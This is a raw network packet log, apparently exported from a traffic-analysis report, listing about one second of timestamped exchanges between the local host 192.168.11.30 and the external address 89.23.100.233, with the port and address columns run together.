                                                                                                    Oct 9, 2024 16:30:20.162904024 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.163028955 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.163038015 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.163134098 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.163141966 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.163150072 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.163158894 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.163254023 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.163254023 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.163403034 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.163521051 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.163569927 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.380338907 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.380352020 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.380378962 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.380721092 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.385132074 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.385173082 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.385294914 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.385303974 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.385312080 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.385312080 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.385482073 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.385597944 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.385607958 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.385732889 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.385901928 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.386492014 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.386501074 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.386509895 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.386518002 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.386538982 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.386548042 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.386555910 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.386570930 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.386703968 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.386743069 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.386845112 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.386913061 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.387059927 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.387072086 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.387080908 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.387231112 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.387315989 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.387326002 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.387334108 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.387341976 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.387350082 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.387357950 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.387605906 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.387644053 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.387773037 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.387790918 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.387798071 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.387984037 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.388108015 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.388130903 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.388299942 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.388334036 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.388343096 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.388350010 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.388556004 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.388714075 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.388830900 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.388884068 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.388997078 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.389178038 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.389291048 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.389413118 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.389911890 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.389928102 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.390203953 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.390213013 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.390264034 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.390315056 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.390324116 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.390520096 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.390532970 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.390749931 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.390981913 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.390990973 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.390999079 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.391078949 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.391211033 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.391331911 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.391416073 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.391433954 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.391793966 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.391803026 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.392146111 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.402534008 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.402543068 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.402740002 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.402889967 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.402932882 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.403109074 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.403279066 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.403480053 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.619048119 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.619317055 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.619472980 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.623517990 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.623796940 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.623965979 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.624006987 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.624124050 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.624201059 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.624269009 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.624368906 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.624614000 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.624835014 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.625067949 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.625118971 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.625189066 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.625283003 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.625303984 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.625349045 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.625475883 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.625654936 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.625669003 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.625984907 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.625986099 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.625994921 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.626157045 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.626287937 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.626401901 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.626665115 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.626861095 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.627042055 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.627449036 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.627660036 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.628849983 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.628859043 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.628963947 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.629064083 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.629200935 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.629249096 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.629463911 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.629712105 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.629731894 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.629909992 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.630079985 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.630196095 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.630400896 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.630568981 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.641104937 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.641115904 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.641170025 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.641294003 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.641493082 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.641514063 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.641774893 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.641850948 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.641983032 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.642021894 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.642151117 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.642344952 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.642376900 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.642529964 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.642622948 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.642683983 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.642755032 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.642764091 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.642771959 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.642869949 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.643069029 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.643074989 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.643255949 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.643415928 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.858084917 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.858345985 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.858489990 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.862005949 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.862133980 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.862212896 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.862386942 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.862394094 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.862432957 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.862576008 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.862715960 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.862936020 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.863105059 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.863231897 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.863413095 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.863447905 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.863584042 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.863694906 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.864008904 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.864017963 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.864203930 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.864224911 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.864233971 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.864361048 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.864408016 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.864478111 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.864609957 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.864748001 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.864953995 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.865148067 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.865156889 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.865257978 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.865449905 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.865616083 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.865834951 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.866003036 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.866110086 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.866288900 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.866458893 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.867167950 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.867312908 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.867397070 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.867465973 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.867532969 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.867719889 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.867728949 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.867768049 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.868091106 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.868122101 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.868263006 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.868431091 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.868633032 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.868772030 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.879667997 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.879900932 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.880022049 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.880031109 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.880069971 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.880198956 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.880290031 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.880455971 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.880491972 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.880542040 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.880757093 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.880831957 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.880908012 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.881001949 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.881050110 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.881231070 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.881234884 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.881239891 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.881357908 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.881529093 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.881938934 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.881947994 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.881968021 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.881975889 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.881984949 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.881993055 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.882065058 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.882256985 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.882265091 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.882314920 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.882360935 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.882369041 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.882407904 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.882577896 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.882586956 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.882745981 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:20.882750988 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.882920980 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:20.883086920 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.097055912 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.097296953 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.097465992 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.100364923 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.100469112 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.100749969 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.100800991 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.100960016 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.101191044 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.101571083 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.101828098 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.101984978 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.102215052 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.102408886 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.102647066 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.102821112 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.102845907 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.102996111 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.103039026 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.103116035 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.103205919 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.103313923 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.103456974 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.103620052 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.103790998 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.103806019 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.103816986 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.103962898 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.104100943 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.104106903 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.104274035 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.104357004 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.104722023 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.105091095 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.106105089 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.106116056 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.106257915 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.106457949 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.106682062 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.106777906 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.107017994 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.107033014 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.107086897 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.107328892 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.107409954 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.107667923 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.118150949 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.118326902 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.118519068 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.118541956 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.118629932 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.118798018 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.119111061 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.119122982 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.119131088 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.119431019 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.119477987 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.119517088 CEST497813192.168.11.3089.23.100.233
